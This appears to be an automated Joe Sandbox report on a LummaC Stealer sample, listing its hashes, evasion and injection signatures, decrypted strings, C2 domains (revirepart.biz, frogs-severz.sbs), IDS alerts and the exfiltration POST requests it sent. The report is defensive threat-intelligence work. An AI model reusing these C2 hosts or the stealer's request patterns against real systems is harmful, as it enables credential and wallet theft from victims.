Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b.exe

Overview

General Information

Sample name:b.exe
Analysis ID:1561391
MD5:1d08526fc81b1d62195f4e5dea52bb6f
SHA1:caeaa9d75af4555ecc6367dd32cd541123c5e5b6
SHA256:5af91198860f878466493a6d92481fcc88d59a182cec02812ce6b3dcd1f0fa38
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • b.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\b.exe" MD5: 1D08526FC81B1D62195F4E5DEA52BB6F)
    • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7728 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 7840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["revirepart.biz"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: b.exe PID: 7648JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      Process Memory Space: aspnet_regiis.exe PID: 7728JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: aspnet_regiis.exe PID: 7728JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T10:25:01.670163+010020283713Unknown Traffic192.168.2.449730104.21.43.198443TCP
            2024-11-23T10:25:03.908693+010020283713Unknown Traffic192.168.2.449732104.21.88.250443TCP
            2024-11-23T10:25:05.901261+010020283713Unknown Traffic192.168.2.449734104.21.88.250443TCP
            2024-11-23T10:25:08.400820+010020283713Unknown Traffic192.168.2.449737104.21.88.250443TCP
            2024-11-23T10:25:11.575585+010020283713Unknown Traffic192.168.2.449740104.21.88.250443TCP
            2024-11-23T10:25:13.846176+010020283713Unknown Traffic192.168.2.449742104.21.88.250443TCP
            2024-11-23T10:25:16.603881+010020283713Unknown Traffic192.168.2.449744104.21.88.250443TCP
            2024-11-23T10:25:18.738157+010020283713Unknown Traffic192.168.2.449747104.21.88.250443TCP
            2024-11-23T10:25:21.447907+010020283713Unknown Traffic192.168.2.449749104.21.88.250443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T10:25:02.355799+010020546531A Network Trojan was detected192.168.2.449730104.21.43.198443TCP
            2024-11-23T10:25:04.617752+010020546531A Network Trojan was detected192.168.2.449732104.21.88.250443TCP
            2024-11-23T10:25:06.597888+010020546531A Network Trojan was detected192.168.2.449734104.21.88.250443TCP
            2024-11-23T10:25:22.151291+010020546531A Network Trojan was detected192.168.2.449749104.21.88.250443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T10:25:02.355799+010020498361A Network Trojan was detected192.168.2.449730104.21.43.198443TCP
            2024-11-23T10:25:04.617752+010020498361A Network Trojan was detected192.168.2.449732104.21.88.250443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T10:25:06.597888+010020498121A Network Trojan was detected192.168.2.449734104.21.88.250443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T10:25:01.670163+010020576471Domain Observed Used for C2 Detected192.168.2.449730104.21.43.198443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T10:25:00.042087+010020576461Domain Observed Used for C2 Detected192.168.2.4567451.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T10:25:20.152926+010020480941Malware Command and Control Activity Detected192.168.2.449747104.21.88.250443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://revirepart.biz/Avira URL Cloud: Label: malware
            Source: https://revirepart.biz/apiAvira URL Cloud: Label: malware
            Source: 0.2.b.exe.6cdd0000.5.unpackMalware Configuration Extractor: LummaC {"C2 url": ["revirepart.biz"]}
            Source: https://revirepart.biz/Virustotal: Detection: 19%Perma Link
            Source: b.exeReversingLabs: Detection: 26%
            Source: b.exeVirustotal: Detection: 30%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
            Source: b.exeJoe Sandbox ML: detected
            Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmpString decryptor: revirepart.biz
            Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245A4DA CryptUnprotectData,2_2_0245A4DA
            Source: b.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.43.198:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: b.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbLIST source: b.exe, 00000000.00000002.1952651431.0000000001078000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\b.PDB source: b.exe, 00000000.00000002.1952651431.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.000000000105E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.000000000106E000.00000004.00000020.00020000.00000000.sdmp, WER95AE.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.0000000001049000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER95AE.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl, source: b.exe, 00000000.00000002.1952651431.0000000001078000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: b.exe, 00000000.00000002.1952543615.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.0000000001019000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Desktop\b.PDBD{ source: b.exe, 00000000.00000002.1952543615.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER95AE.tmp.dmp.5.dr
            Source: C:\Users\user\Desktop\b.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0089F880
            Source: C:\Users\user\Desktop\b.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_008AF670
            Source: C:\Users\user\Desktop\b.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]0_2_0089AF10
            Source: C:\Users\user\Desktop\b.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_008C4940
            Source: C:\Users\user\Desktop\b.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]0_2_008C4370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, eax2_2_02449AE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]2_2_02449AE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], dl2_2_0244DA8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_02482B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edx], al2_2_0246F3ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]2_2_0246E398
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edx], cl2_2_0246EB98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]2_2_024590D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]2_2_0244B97E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5B126FE8h2_2_024827D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]2_2_0244AD50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]2_2_02482530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, esi2_2_0244C5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0245DA40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+esi*8], 4F699CD4h2_2_02483260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov di, 0008h2_2_02444A31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax]2_2_0247DAC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+30h]2_2_0245E2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0245E2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0246CAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]2_2_0246B340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_0245EFF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h2_2_0245EFF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push ebx2_2_0244C303
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0245BB10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h2_2_0245FB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0245FB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_02466BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]2_2_02466BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [edi]2_2_02466BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_02466BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0246D040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dl, EAh2_2_02481860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0246E06F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]2_2_02447870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+edx*4+30h]2_2_02447870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax2_2_02442820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], dl2_2_0246D830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0246E039
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi-3E780BCDh]2_2_0246A0D5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0246E007
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]2_2_0246B0FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]2_2_0244F096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]2_2_0244F096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, esi2_2_024468B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h2_2_02482970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dl, EAh2_2_02481930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_024779E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+1Ch]2_2_0244E1EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edx], di2_2_0245FF7F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_02465190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0244CE52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebx+ecx-18254539h]2_2_0244CE52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_02466E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]2_2_02466E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [edi]2_2_02466E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_02466E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ecx], dl2_2_0246DE10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, edi2_2_0245F6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, ecx2_2_0245F6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6032535Eh]2_2_024696F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_02466F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]2_2_02466F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [edi]2_2_02466F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_02466F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edx], di2_2_0245FF7F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000A28h]2_2_0244E714
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_0245C7C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h2_2_0244E7D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_0245EFF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h2_2_0245EFF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]2_2_0246EF87
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D3h]2_2_0245BFB6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0246D4A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+2C0C617Eh]2_2_0245DD48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax+00000404h]2_2_0246FD65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, eax2_2_0246FD65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_02466510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ecx2_2_02469520

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057646 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz) : 192.168.2.4:56745 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057647 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI) : 192.168.2.4:49730 -> 104.21.43.198:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.43.198:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.43.198:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49747 -> 104.21.88.250:443
            Source: Malware configuration extractorURLs: revirepart.biz
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.43.198:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.88.250:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.88.250:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: frogs-severz.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PIXVMC0RVNH46CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18146Host: frogs-severz.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1EJD49M7KDWLPUQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8773Host: frogs-severz.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SEPOOODGTKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: frogs-severz.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=69WLIBOBDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1248Host: frogs-severz.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QE9559A41CV3RM9L5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1140Host: frogs-severz.sbs
